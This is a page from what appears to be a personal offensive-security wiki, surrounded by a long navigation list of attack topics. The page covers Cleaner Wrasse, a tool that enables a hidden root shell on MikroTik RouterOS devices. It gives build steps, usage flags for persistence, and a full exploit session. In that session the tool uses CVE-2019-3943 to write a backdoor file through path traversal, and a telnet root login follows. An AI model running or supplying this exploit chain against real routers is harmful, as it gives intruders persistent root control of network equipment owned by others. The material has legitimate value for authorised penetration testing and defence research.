Hacknetics
  • Hacknetics
  • Active Directory Management
    • How to Join a Windows 11 PC to a Domain
    • Allow RDP in the domain
  • Active Directory AD Attacks
    • Bloodhound
      • Bloodhound Cypher Queries
    • Impacket-install
    • Kerberos cheatsheet
    • Domain Controllers
    • Overpass The Hash/Pass The Key (PTK)
    • Bloodhound Python
    • Rubeus to Ccache
    • Silver Ticket
    • Golden Ticket
    • Abusing GPO Permissions
    • AppLocker Bypasses
    • SharpView Enumeration
    • DonPapi
    • AD Overview
    • Enumerating Forests
    • NOPAC Priv esc
  • buffer-overflows
    • Buffer Overflows
  • c2-frameworks
    • Sliver
    • Powershell Empire
      • IronPython Empire
    • Metasploit
      • Metasploit Basics
      • Custom MSF Resource Scripts
      • Meterpreter Device Survey
      • Paranoid Mode
    • Pwncat-cs
    • Cobalt Strike
    • Dcrat
      • Modules
      • Builder
      • Dcrat AV Evasion
      • C2 Comms
    • FFM Documentation
  • covering-tracks
    • Evading Logging and Monitoring
    • Linux Logging
    • Tor
    • Windows Log Clearing
    • Ghost Writing Binaries
    • Backdoor Linux Commands
  • Data Exfiltration
  • Exploit Development
    • ROP Finding the vulnerable function
    • Useful Tools for Exploit Dev
    • ropeme
    • Obtaining MSFT Patches for Analysis
    • Mutiny Fuzzer
    • GDB
  • file-transfers
    • Transfering Files
  • lateral-movement
    • Pivoting Enumeration
      • Proxychains and FoxyProxy
      • SSH Tunneling and Port Forwarding
      • Plink.exe
      • socat
      • Chisel
      • SShuttle
  • lin-priv-esc
    • Linux Privilege Escalation
    • Bash Jails
    • ssh agent
  • Things I have Pwn'd before
    • Tomcat
    • Jenkins
  • persistence
    • Linux Persistence
    • Windows Persistence
      • Assign Group Memberships
      • Guest Windows Account Persistence
      • WMI Persist With Event Filters
      • SAM SYSTEM Exfil / Pass The Hash
      • Backdoor Executable
      • Special Privileges and Security Descriptors
      • RID Hijacking
      • Task Scheduler
      • Hijacking File Associations
      • Abusing Services
      • Logon Triggered Persistence
      • MSSQL Enabling xp cmdshell
      • Sticky Keys
      • Using Web Shells
  • recon-enumeration
    • Exploit Research
    • Pentesting DNS
    • Pentesting Kerberos
    • Pentesting FTP
    • Pentesting Email
    • Pentesting SMB
    • Pentesting Redis
    • Banner Grabbing
    • Pentesting Rsync
    • Pentesting MsSql
    • Scanning
    • Pentesting SNMP
    • Pentesting NFS
    • Pentesting LDAP
    • Pentesting Finger
    • User Recon
  • resources
    • resources
    • Youtube / Book List
    • CS/Software Engineer Resources
  • shells
    • Shells
    • web-shells
      • PHP Reverse Shell
      • wwwolf's PHP web shell
  • tool-guides
    • Asymmetric File Encrypt and Decrypt
    • Aws Buckets
    • cewl-crunch
    • Creating a Custom Wordlist
    • evil-winrm
    • Git
    • gobuster
    • Hashcat
    • Hydra User Guide
    • John
    • Linux Basics
    • Mimikatz
    • netcat
    • Nmap
    • nuclei
    • PowerView
    • r2
    • Resources
    • tcpdump
    • T-Shark User Guide
    • tmux
    • ssh
    • Vim
    • Wireshark
    • kwp
    • LAPS
    • KeePass KeeThief
    • FileCryptography.psm1
    • Impacket Pastable Commands
    • crackmapexec Pastable Commands
    • feroxbuster
    • NetExec
    • Ligolo-ng
    • gs-netcat
    • Scarecrow
  • Web Path
    • Testing for LFI
    • Testing for RFI
    • Testing for SQL
    • Testing for XSS
    • Authentication Bypass
    • Cmd Injection
    • Javascript Vulnerabilities
    • SSTI
    • Web Servers
    • JWT Tokens
    • Adobe Coldfusion
    • NoSQL Injection
    • vhost Enumeration
  • Wifi/Bluetooth/ZigBee/SDR/SmartCards
    • Wifi Capture Filters
    • Bluetooth Basics
    • Wifi Overview
    • Bettercap Bluetooth / Wifi
    • Aircrack-ng
    • Airdecap-ng
    • Aireplay-ng
    • RTL-SDR Radio
    • Bluetooth Low Energy
    • Smart Cards
    • Airodump-ng Airgraph-ng
    • gqrx
  • Windows
    • powershell-cheatsheet
    • Windows Privlage Escalation
    • Anti-Virus Evasion
    • Windows Registry
    • exploits
      • printspoofer
    • Windows Kernel Vulnerabilities
    • Windows Defender
    • AMSI Bypasses
    • pktmon Packet Capture Windows
    • Powershell Constrained Language Mode
    • Windows Survey
    • Windows Persistence
    • Windows World Writeable Dirs
  • firewalls
    • iptables
    • ufw
    • netsh advfirewall
  • Malware Analysis
    • Malware Analysis Fundamentals
    • Packer Identification by File section names
    • Analyzing Malicious Documents
    • In Depth Malware Analysis
    • Reversing Malicious Code
  • Infrastructure Development
    • SSL Cert Generation
    • Pfsense
      • OpenVPN Server on Pfsense
    • Proxmox OVA Import
  • Python3 Reference
    • Python3 Cheatsheet
    • Regex Python3
  • EDR
    • Velociraptor EDR
  • Host Forensics
    • Windows Host Forensics
    • Windows NT Versions
    • Windows Logs
  • Cloud
    • AWS
  • OSINT
    • Spiderfoot
    • Shodan Dorks
  • Phishing
  • Random
  • Linux
    • awk
    • cut
    • grep
    • sort
    • Cups CVE2024
  • Windows Malware Development
    • Win32 API
    • Processes Threads Handles
      • Message Box Example (Basic)
      • CreateProcess Example (Basic)
  • Golang
  • Mikrotik
    • Implementing a Password Reset Function for Persistent Access in MikroTik RouterOS
    • Cleaner Wrasse
  • Firmware Reversing
Powered by GitBook
On this page
  • Overview
  • Install and Configuration
  • Usage
  • Exploit

Was this helpful?

Edit on GitHub
  1. Mikrotik

Cleaner Wrasse

Overview

  • Cleaner Wrasse is a tool that remotely enables the hidden busybox shell in routers using RouterOS versions 3.x - 6.43.14. CW doesn't care about the router's architecture or any periphials. It should just work. Once enabled, the hidden shell allows the devel user to login with the admin's password over telnet or SSH. The user is then presented with a root shell. It's damn useful.

Install and Configuration

sudo apt install cmake
sudo apt-get install libboost-all-dev

git clone https://github.com/tenable/routeros.git
cd routeros/
cd cleaner_wrasse/
mkdir build
cd ./build/
cmake ..
make

Usage

./cleaner_wrasse 
options:
  -h [ --help ]             A list of command line options
  -v [ --version ]          Display version information
  -u [ --username ] arg     REQUIRED The user to log in as.
  -p [ --password ] arg     The password to log in with (if not provided CW 
                            uses an empty string).
  -i [ --ip ] arg           REQUIRED The IPv4 address to connect to.
  -s [ --symlink ] arg (=0) Add the survival symlink on the target if its 6.41+
  --persistence arg (=0)    Enable persistence on targets 6.41+

./cleaner_wrasse -v
Version: ><(((°> Cleaner Wrasse 1.0 - August 11, 2019 ><(((°>

Exploit

./cleaner_wrasse -u admin -p mikrotikmikrotik -i 192.168.15.77 

            ><(((°>         ><(((°>         ><(((°> 
           ╔═╗┬  ┌─┐┌─┐┌┐┌┌─┐┬─┐  ╦ ╦┬─┐┌─┐┌─┐┌─┐┌─┐
           ║  │  ├┤ ├─┤│││├┤ ├┬┘  ║║║├┬┘├─┤└─┐└─┐├┤ 
           ╚═╝┴─┘└─┘┴ ┴┘└┘└─┘┴└─  ╚╩╝┴└─┴ ┴└─┘└─┘└─┘
                    <°)))><         <°)))><         

   "Cleaners are nothing but very clever behavioral parasites"

[+] Trying winbox on 192.168.15.77:8291
[+] Connected on 8291!
[+] Logging in as admin
[+] Login success!
[+] Sending a version request
[+] The device is running RouterOS 6.40.5 (stable)
[+] The backdoor location is /flash/nova/etc/devel-login
[+] We support 3 vulnerabilities for this version:
	1. CVE-2019-3943
	2. HackerFantastic Set Tracefile
	3. CVE-2018-14847
[?] Please select an vulnerability (1-3):1
[+] You've selected CVE-2019-3943. What a fine choice!
[+] Opening //./.././.././../flash/nova/etc/devel-login for writing.
[+] Done! The backdoor is active. ><(((°>

telnet -l devel 192.168.15.77
<admin-password>
PreviousImplementing a Password Reset Function for Persistent Access in MikroTik RouterOSNextFirmware Reversing

Last updated 18 days ago

Was this helpful?